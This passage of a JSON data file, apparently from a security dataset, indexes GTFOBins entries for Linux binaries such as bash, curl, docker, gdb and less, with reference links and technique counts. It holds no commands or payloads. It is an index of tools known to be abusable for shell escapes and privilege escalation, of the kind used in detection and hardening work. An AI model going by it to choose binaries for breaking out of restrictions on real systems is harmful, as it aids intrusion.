,"count":3},{"id":"gtfo:at","name":"at","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/at/"],"count":4},{"id":"gtfo:atobm","name":"atobm","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/atobm/"],"count":3},{"id":"gtfo:autoconf","name":"autoconf","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/autoconf/"],"count":2},{"id":"gtfo:autoheader","name":"autoheader","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/autoheader/"],"count":2},{"id":"gtfo:autoreconf","name":"autoreconf","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/autoreconf/"],"count":2},{"id":"gtfo:aws","name":"aws","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/aws/"],"count":5},{"id":"gtfo:base32","name":"base32","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/base32/"],"count":3},{"id":"gtfo:base58","name":"base58","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/base58/"],"count":2},{"id":"gtfo:base64","name":"base64","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/base64/"],"count":3},{"id":"gtfo:basenc","name":"basenc","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/basenc/"],"count":3},{"id":"gtfo:basez","name":"basez","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/basez/"],"count":3},{"id":"gtfo:bash","name":"bash","source":"GTFOBins","platform":["Linux"],"aliases":["ksh"],"references":["https://gtfobins.github.io/gtfobins/bash/"],"count":33},{"id":"gtfo:bashbug","name":"bashbug","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/bashbug/"],"count":2},{"id":"gtfo:batcat","name":"batcat","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/batcat/"],"count":3},{"id":"gtfo:bbot","name":"bbot","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/bbot/"],"count":2},{"id":"gtfo:bc","name":"bc","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/bc/"],"count":3},{"id":"gtfo:bconsole","name":"bconsole","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/bconsole/"],"count":5},{"id":"gtfo:bee","name":"bee","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/bee/"],"count":3},{"id":"gtfo:borg","name":"borg","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/borg/"],"count":2},{"id":"gtfo:bpftrace","name":"bpftrace","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/bpftrace/"],"count":3},{"id":"gtfo:bridge","name":"bridge","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/bridge/"],"count":3},{"id":"gtfo:bundle","name":"bundle","source":"GTFOBins","platform":["Linux"],"aliases":["bundler"],"references":["https://gtfobins.github.io/gtfobins/bundle/"],"count":10},{"id":"gtfo:busctl","name":"busctl","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/busctl/"],"count":9},{"id":"gtfo:busybox","name":"busybox","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/busybox/"],"count":8},{"id":"gtfo:byebug","name":"byebug","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/byebug/"],"count":2},{"id":"gtfo:bzip2","name":"bzip2","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/bzip2/"],"count":3},{"id":"gtfo:cabal","name":"cabal","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/cabal/"],"count":3},{"id":"gtfo:cancel","name":"cancel","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/cancel/"],"count":3},{"id":"gtfo:capsh","name":"capsh","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/capsh/"],"count":3},{"id":"gtfo:cargo","name":"cargo","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/cargo/"],"count":2},{"id":"gtfo:cat","name":"cat","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/cat/"],"count":3},{"id":"gtfo:cdist","name":"cdist","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/cdist/"],"count":2},{"id":"gtfo:certbot","name":"certbot","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/certbot/"],"count":2},{"id":"gtfo:chattr","name":"chattr","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/chattr/"],"count":2},{"id":"gtfo:check_by_ssh","name":"check_by_ssh","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/check_by_ssh/"],"count":2},{"id":"gtfo:check_cups","name":"check_cups","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/check_cups/"],"count":2},{"id":"gtfo:check_log","name":"check_log","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/check_log/"],"count":4},{"id":"gtfo:check_memory","name":"check_memory","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/check_memory/"],"count":2},{"id":"gtfo:check_raid","name":"check_raid","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/check_raid/"],"count":2},{"id":"gtfo:check_ssl_cert","name":"check_ssl_cert","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/check_ssl_cert/"],"count":2},{"id":"gtfo:check_statusfile","name":"check_statusfile","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/check_statusfile/"],"count":2},{"id":"gtfo:chmod","name":"chmod","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/chmod/"],"count":2},{"id":"gtfo:choom","name":"choom","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/choom/"],"count":3},{"id":"gtfo:chown","name":"chown","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/chown/"],"count":2},{"id":"gtfo:chroot","name":"chroot","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/chroot/"],"count":2},{"id":"gtfo:chrt","name":"chrt","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/chrt/"],"count":3},{"id":"gtfo:clamscan","name":"clamscan","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/clamscan/"],"count":3},{"id":"gtfo:clisp","name":"clisp","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/clisp/"],"count":3},{"id":"gtfo:cmake","name":"cmake","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/cmake/"],"count":4},{"id":"gtfo:cmp","name":"cmp","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/cmp/"],"count":3},{"id":"gtfo:cobc","name":"cobc","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/cobc/"],"count":3},{"id":"gtfo:code","name":"code","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/code/"],"count":6},{"id":"gtfo:codex","name":"codex","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/codex/"],"count":2},{"id":"gtfo:column","name":"column","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/column/"],"count":3},{"id":"gtfo:comm","name":"comm","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/comm/"],"count":3},{"id":"gtfo:composer","name":"composer","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/composer/"],"count":2},{"id":"gtfo:cowsay","name":"cowsay","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/cowsay/"],"count":2},{"id":"gtfo:cowthink","name":"cowthink","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/cowthink/"],"count":2},{"id":"gtfo:cp","name":"cp","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/cp/"],"count":10},{"id":"gtfo:cpan","name":"cpan","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/cpan/"],"count":2},{"id":"gtfo:cpio","name":"cpio","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/cpio/"],"count":10},{"id":"gtfo:cpulimit","name":"cpulimit","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/cpulimit/"],"count":3},{"id":"gtfo:crash","name":"crash","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/crash/"],"count":5},{"id":"gtfo:crontab","name":"crontab","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/crontab/"],"count":4},{"id":"gtfo:csh","name":"csh","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/csh/"],"count":6},{"id":"gtfo:csplit","name":"csplit","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/csplit/"],"count":6},{"id":"gtfo:csvtool","name":"csvtool","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/csvtool/"],"count":9},{"id":"gtfo:ctr","name":"ctr","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ctr/"],"count":2},{"id":"gtfo:cupsfilter","name":"cupsfilter","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/cupsfilter/"],"count":3},{"id":"gtfo:curl","name":"curl","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/curl/"],"count":21},{"id":"gtfo:cut","name":"cut","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/cut/"],"count":3},{"id":"gtfo:dash","name":"dash","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/dash/"],"count":6},{"id":"gtfo:date","name":"date","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/date/"],"count":3},{"id":"gtfo:dc","name":"dc","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/dc/"],"count":3},{"id":"gtfo:dd","name":"dd","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/dd/"],"count":6},{"id":"gtfo:debugfs","name":"debugfs","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/debugfs/"],"count":3},{"id":"gtfo:dhclient","name":"dhclient","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/dhclient/"],"count":2},{"id":"gtfo:dialog","name":"dialog","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/dialog/"],"count":3},{"id":"gtfo:diff","name":"diff","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/diff/"],"count":6},{"id":"gtfo:dig","name":"dig","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/dig/"],"count":3},{"id":"gtfo:distcc","name":"distcc","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/distcc/"],"count":3},{"id":"gtfo:dmesg","name":"dmesg","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/dmesg/"],"count":6},{"id":"gtfo:dmidecode","name":"dmidecode","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/dmidecode/"],"count":1},{"id":"gtfo:dmsetup","name":"dmsetup","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/dmsetup/"],"count":3},{"id":"gtfo:dnf","name":"dnf","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/dnf/"],"count":1},{"id":"gtfo:dnsmasq","name":"dnsmasq","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/dnsmasq/"],"count":3},{"id":"gtfo:doas","name":"doas","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/doas/"],"count":2},{"id":"gtfo:docker","name":"docker","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/docker/"],"count":12},{"id":"gtfo:dos2unix","name":"dos2unix","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/dos2unix/"],"count":6},{"id":"gtfo:dosbox","name":"dosbox","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/dosbox/"],"count":9},{"id":"gtfo:dotnet","name":"dotnet","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/dotnet/"],"count":4},{"id":"gtfo:dpkg","name":"dpkg","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/dpkg/"],"count":4},{"id":"gtfo:dstat","name":"dstat","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/dstat/"],"count":2},{"id":"gtfo:dvips","name":"dvips","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/dvips/"],"count":3},{"id":"gtfo:easy_install","name":"easy_install","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/easy_install/"],"count":2},{"id":"gtfo:easyrsa","name":"easyrsa","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/easyrsa/"],"count":3},{"id":"gtfo:eb","name":"eb","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/eb/"],"count":2},{"id":"gtfo:ed","name":"ed","source":"GTFOBins","platform":["Linux"],"aliases":["red"],"references":["https://gtfobins.github.io/gtfobins/ed/"],"count":9},{"id":"gtfo:efax","name":"efax","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/efax/"],"count":2},{"id":"gtfo:egrep","name":"egrep","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/egrep/"],"count":3},{"id":"gtfo:elvish","name":"elvish","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/elvish/"],"count":9},{"id":"gtfo:emacs","name":"emacs","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/emacs/"],"count":6},{"id":"gtfo:enscript","name":"enscript","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/enscript/"],"count":3},{"id":"gtfo:env","name":"env","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/env/"],"count":3},{"id":"gtfo:eqn","name":"eqn","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/eqn/"],"count":3},{"id":"gtfo:espeak","name":"espeak","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/espeak/"],"count":3},{"id":"gtfo:ex","name":"ex","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ex/"],"count":6},{"id":"gtfo:exiftool","name":"exiftool","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/exiftool/"],"count":12},{"id":"gtfo:expand","name":"expand","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/expand/"],"count":3},{"id":"gtfo:expect","name":"expect","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/expect/"],"count":6},{"id":"gtfo:facter","name":"facter","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/facter/"],"count":4},{"id":"gtfo:fail2ban-client","name":"fail2ban-client","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/fail2ban-client/"],"count":2},{"id":"gtfo:fastfetch","name":"fastfetch","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/fastfetch/"],"count":9},{"id":"gtfo:ffmpeg","name":"ffmpeg","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ffmpeg/"],"count":3},{"id":"gtfo:fgrep","name":"fgrep","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/fgrep/"],"count":3},{"id":"gtfo:file","name":"file","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/file/"],"count":6},{"id":"gtfo:find","name":"find","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/find/"],"count":9},{"id":"gtfo:finger","name":"finger","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/finger/"],"count":6},{"id":"gtfo:firejail","name":"firejail","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/firejail/"],"count":2},{"id":"gtfo:fish","name":"fish","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/fish/"],"count":3},{"id":"gtfo:flock","name":"flock","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/flock/"],"count":3},{"id":"gtfo:fmt","name":"fmt","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/fmt/"],"count":6},{"id":"gtfo:fold","name":"fold","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/fold/"],"count":3},{"id":"gtfo:forge","name":"forge","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/forge/"],"count":3},{"id":"gtfo:fping","name":"fping","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/fping/"],"count":3},{"id":"gtfo:ftp","name":"ftp","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ftp/"],"count":9},{"id":"gtfo:fzf","name":"fzf","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/fzf/"],"count":6},{"id":"gtfo:gawk","name":"gawk","source":"GTFOBins","platform":["Linux"],"aliases":["nawk"],"references":["https://gtfobins.github.io/gtfobins/gawk/"],"count":15},{"id":"gtfo:gcc","name":"gcc","source":"GTFOBins","platform":["Linux"],"aliases":["c89","c99","cc","g++"],"references":["https://gtfobins.github.io/gtfobins/gcc/"],"count":8},{"id":"gtfo:gcloud","name":"gcloud","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/gcloud/"],"count":3},{"id":"gtfo:gcore","name":"gcore","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/gcore/"],"count":3},{"id":"gtfo:gdb","name":"gdb","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/gdb/"],"count":10},{"id":"gtfo:gem","name":"gem","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/gem/"],"count":8},{"id":"gtfo:genie","name":"genie","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/genie/"],"count":3},{"id":"gtfo:genisoimage","name":"genisoimage","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/genisoimage/"],"count":6},{"id":"gtfo:getent","name":"getent","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/getent/"],"count":2},{"id":"gtfo:ghc","name":"ghc","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ghc/"],"count":2},{"id":"gtfo:ghci","name":"ghci","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ghci/"],"count":2},{"id":"gtfo:gimp","name":"gimp","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/gimp/"],"count":2},{"id":"gtfo:ginsh","name":"ginsh","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ginsh/"],"count":3},{"id":"gtfo:git","name":"git","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/git/"],"count":17},{"id":"gtfo:gnuplot","name":"gnuplot","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/gnuplot/"],"count":3},{"id":"gtfo:go","name":"go","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/go/"],"count":10},{"id":"gtfo:grc","name":"grc","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/grc/"],"count":2},{"id":"gtfo:grep","name":"grep","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/grep/"],"count":3},{"id":"gtfo:gtester","name":"gtester","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/gtester/"],"count":6},{"id":"gtfo:guile","name":"guile","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/guile/"],"count":3},{"id":"gtfo:gzip","name":"gzip","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/gzip/"],"count":4},{"id":"gtfo:hashcat","name":"hashcat","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/hashcat/"],"count":2},{"id":"gtfo:head","name":"head","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/head/"],"count":3},{"id":"gtfo:hexdump","name":"hexdump","source":"GTFOBins","platform":["Linux"],"aliases":["hd"],"references":["https://gtfobins.github.io/gtfobins/hexdump/"],"count":3},{"id":"gtfo:hg","name":"hg","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/hg/"],"count":3},{"id":"gtfo:highlight","name":"highlight","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/highlight/"],"count":3},{"id":"gtfo:hping3","name":"hping3","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/hping3/"],"count":4},{"id":"gtfo:iconv","name":"iconv","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/iconv/"],"count":6},{"id":"gtfo:iftop","name":"iftop","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/iftop/"],"count":3},{"id":"gtfo:install","name":"install","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/install/"],"count":2},{"id":"gtfo:ionice","name":"ionice","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ionice/"],"count":3},{"id":"gtfo:ip","name":"ip","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ip/"],"count":6},{"id":"gtfo:iptables-save","name":"iptables-save","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/iptables-save/"],"count":1},{"id":"gtfo:irb","name":"irb","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/irb/"],"count":2},{"id":"gtfo:ispell","name":"ispell","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ispell/"],"count":3},{"id":"gtfo:java","name":"java","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/java/"],"count":2},{"id":"gtfo:jjs","name":"jjs","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/jjs/"],"count":10},{"id":"gtfo:joe","name":"joe","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/joe/"],"count":3},{"id":"gtfo:join","name":"join","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/join/"],"count":3},{"id":"gtfo:journalctl","name":"journalctl","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/journalctl/"],"count":2},{"id":"gtfo:jq","name":"jq","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/jq/"],"count":3},{"id":"gtfo:jrunscript","name":"jrunscript","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/jrunscript/"],"count":11},{"id":"gtfo:jshell","name":"jshell","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/jshell/"],"count":6},{"id":"gtfo:jtag","name":"jtag","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/jtag/"],"count":2},{"id":"gtfo:julia","name":"julia","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/julia/"],"count":15},{"id":"gtfo:knife","name":"knife","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/knife/"],"count":2},{"id":"gtfo:ksshell","name":"ksshell","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ksshell/"],"count":3},{"id":"gtfo:ksu","name":"ksu","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ksu/"],"count":1},{"id":"gtfo:kubectl","name":"kubectl","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/kubectl/"],"count":5},{"id":"gtfo:last","name":"last","source":"GTFOBins","platform":["Linux"],"aliases":["lastb"],"references":["https://gtfobins.github.io/gtfobins/last/"],"count":3},{"id":"gtfo:latex","name":"latex","source":"GTFOBins","platform":["Linux"],"aliases":["xelatex"],"references":["https://gtfobins.github.io/gtfobins/latex/"],"count":9},{"id":"gtfo:latexmk","name":"latexmk","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/latexmk/"],"count":6},{"id":"gtfo:ld.so","name":"ld.so","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ld.so/"],"count":3},{"id":"gtfo:ldconfig","name":"ldconfig","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ldconfig/"],"count":3},{"id":"gtfo:less","name":"less","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/less/"],"count":24},{"id":"gtfo:lftp","name":"lftp","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/lftp/"],"count":3},{"id":"gtfo:links","name":"links","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/links/"],"count":3},{"id":"gtfo:ln","name":"ln","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ln/"],"count":1},{"id":"gtfo:loginctl","name":"loginctl","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/loginctl/"],"count":2},{"id":"gtfo:logrotate","name":"logrotate","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/logrotate/"],"count":7},{"id":"gtf